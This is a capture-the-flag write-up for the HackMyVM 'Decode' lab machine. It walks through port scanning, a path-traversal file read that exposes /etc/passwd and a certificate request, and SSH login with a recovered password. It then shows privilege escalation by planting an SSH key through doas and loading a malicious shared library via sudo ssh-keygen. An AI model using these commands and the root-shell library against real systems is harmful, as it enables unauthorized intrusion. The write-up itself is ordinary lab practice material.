NOTES ABOUT Decode

[ 2022-10-23 ] [ HackMyVM / Decode ]

Status: Rooted
Skills: Port Scanning, LFI, OpenSSL, CSR Decode, Sudo, Lib Injction
Tools: nmap, ssh, gobuster, curl, curlfi, doas, tee, ssh-keygen

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.36

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
| 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/encode/
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.18.0

GETTING IN

WEB SERVER AND LFI SEARCHING

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,sh -u http://10.0.2.36 
/index.html (Status: 200) [Size: 612]
/cgi-bin (Status: 301) [Size: 169] [--> http://10.0.2.36/cgi-bin/]
/1 (Status: 200) [Size: 240]
/file.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 240]
/decode (Status: 301) [Size: 169] [--> http://10.0.2.36/decode/]

$ curl 10.0.2.36/1
User-agent: decode
Disallow: /encode/

User-agent: *
Allow: /
Allow: /decode
Allow: ../
Allow: /index
Allow: .shtml
Allow: /lfi../
Allow: /etc/
Allow: passwd
Allow: /usr/
Allow: share
Allow: /var/www/html/
Allow: /cgi-bin/
Allow: decode.sh

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.36/decode/
[...]
/shadow (Status: 403) [Size: 153]
[...]
/hosts (Status: 200) [Size: 186]
/passwd (Status: 200) [Size: 1638]
[...]

$ curl 10.0.2.36/decode/passwd
root:x:0:0:root:/root:/bin/bash
[...]
steve:$y$j9T$gbohHcbFkUEmW0d3ZeUx40$Xa/DJJdFujIezo5lg9PDmswZH32cG6kAWP.crcqrqo/:1001:1001::/usr/share:/bin/bash
decoder:x:1002:1002::/home/decoder:/usr/sbin/nologin
ajneya:x:1003:1003::/home/ajneya:/bin/bash

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.36/decode../
/home (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../home/]
/media (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../media/]
/bin (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../bin/]
/lib (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../lib/]
/dev (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../dev/]
/etc (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../etc/]
/root (Status: 403) [Size: 153]
/tmp (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../tmp/]
/sys (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../sys/]
/var (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../var/]
/usr (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../usr/]
/run (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../run/]
/boot (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../boot/]
/opt (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../opt/]
/srv (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../srv/]
/proc (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../proc/]
/sbin (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../sbin/]

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.36/decode../home/
/steve (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../home/steve/]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../home/steve/
/.bash_history (Status: 200) [Size: 15]
/.profile (Status: 200) [Size: 807]
/.ssh (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../home/steve/.ssh/]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../home/steve/.ssh/
/id_rsa (Status: 200) [Size: 15]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../home/ajneya/
/.bashrc (Status: 200) [Size: 3526]
/.profile (Status: 200) [Size: 807]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../usr/share/
/.bash_history (Status: 200) [Size: 38]
/.bashrc (Status: 200) [Size: 3526]

GETTING STEVE

$ ./curlfi.sh 10.0.2.36/decode../

curl 10.0.2.36/decode../etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
steve:$y$j9T$gbohHcbFkUEmW0d3ZeUx40$Xa/DJJdFujIezo5lg9PDmswZH32cG6kAWP.crcqrqo/:1001:1001::/usr/share:/bin/bash
decoder:x:1002:1002::/home/decoder:/usr/sbin/nologin
ajneya:x:1003:1003::/home/ajneya:/bin/bash

curl 10.0.2.36/decode../home/steve/.bash_history
nothingHere :(

curl 10.0.2.36/decode../home/steve/.ssh/id_rsa
nothingHere :(

curl 10.0.2.36/decode../usr/share/.bash_history
rm -rf /usr/share/ssl-cert/decode.csr

curl 10.0.2.36/decode../usr/share/ssl-cert/decode.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIDAzCCAesCAQAwSDERMA8GA1UEAwwISGFja015Vk0xDzANBgNVBAgMBmRlY29k
[...]
h97It2ELpw==
-----END CERTIFICATE REQUEST-----

CERTIFICATE REQUEST DECODE

$ curl  10.0.2.36/decode../usr/share/ssl-cert/decode.csr -O
$ file ./decode.csr
./decode.csr: PEM certificate request

$ openssl req -in ./decode.csr -noout -text
Certificate Request:
[...]
challengePassword :*****
[...]

$ ssh steve@10.0.2.36
steve@10.0.2.36\'s password:

steve@decode:~$ id
uid=1001(steve) gid=1001(steve) groups=1001(steve)
steve@decode:~$ pwd
/usr/share

ELEVATING PRIVILEGES

SEARCHING...

steve@decode:/tmp$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
[...]
-rwsr-xr-x 1 root root 39008 Feb 4 2021 /usr/bin/doas
[...]

steve@decode:/tmp$ find / -name "*doas*" 2>/dev/null
/etc/doas.conf
[...]

steve@decode:/tmp$ cat /etc/doas.conf
permit nopass steve as ajneya cmd cp

STEVE TO AJNEYA

steve@decode:/tmp$ mkdir .ssh
steve@decode:\/tmp$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD4fDuTx+n73Gh8As0eZTT9fipIpZyF64YBWCzN3GH9eSxw/w2w8u6fm4KC5Pc2qo9LfdAsw7XyrdLRZsKD39a5gHrVSZ1+pOyj4dWYhoeWhPNNDzypCsee7VCzrJARYMzN9t4CxvnN+01O3SpF/vbWRzSm+k9rTgSMhm6yarBOUWrWosH2uxEop4dKxR5xTJlQA+YciOYTO+BLTfXJpKkutrl8TUO0px820QCdtzUlfDD7iq3+wPouYumY1kKwtxxA5s7Qjqdrr9eAgVw1LQJPbCpSFxm/aHZZE7h/OTXOSPsTGc0gV4R6d3tQ3IOEQGhsVCvBv0ogOmSpcF4YEB/r4Idh2i07KGY/9SStKWPEDrg8JgXx+vZAziNzNcEEwQqeMbpBun2Xv5FCSs/GVfyqSeck5GbKqD+mtqQCuSqQnXj52cpEUoWn1VS/Cs0QmH27afyMuODYNzgUkebs2nXkpCxX30/CO3tCbMLfi4dDMUffTnjc+NDstl3Qa8FM/4c= kali@kali" > ./.ssh/authorized_keys
steve@decode:/tmp$ doas -u ajneya cp -r ./.ssh/ /home/ajneya
steve@decode:/tmp$ exit

$ ssh ajneya@10.0.2.36 -i id_decoder
ajneya@decode:~$ id
uid=1003(ajneya) gid=1003(ajneya) groups=1003(ajneya)
ajneya@decode:~$ pwd
/home/ajneya
ajneya@decode:~$ cat user.txt
*********************

ajneya@decode:~$ sudo -l
Matching Defaults entries for ajneya on decode:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ajneya may run the following commands on decode:
(root) NOPASSWD: /usr/bin/ssh-keygen * /opt/*

ajneya@decode:~$ ls -laR /opt/
/opt/:
total 12
drwxr-xr-x 3 root root 4096 Apr 14 2022 .
drwxr-xr-x 18 root root 4096 Apr 14 2022 ..
drwx------ 2 decoder decoder 4096 Oct 23 14:19 decode
ls: cannot open directory '/opt/decode': Permission denied

AJNEYA TO ROOT (STEVE TO DECODER SUPPORT)

$ cat badlib.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
int C_GetFunctionList(void)
{
setuid(0);
setgid(0);
system("/bin/bash");
}

$ gcc -shared -o badlib.so -fPIC badlib.c
$ scp badlib.so steve@10.0.2.36:/tmp

$ ssh steve@10.0.2.36
steve@decode:~$ cat /tmp/badlib.so | sudo -u decoder /usr/bin/tee /opt/decode/badlib.so

ssh ajneya@10.0.2.36 -i ./ssh/id_decoder
ajneya@decode:~$ sudo ssh-keygen -D /opt/decode/badlib.so

root@decode:/home/ajneya#

root@decode:~# cat root.txt
*********************

root@decode:~# init 0
root@decode:~# Connection to 10.0.2.36 closed by remote host.
Connection to 10.0.2.36 closed.

--- Loaded 536 times ---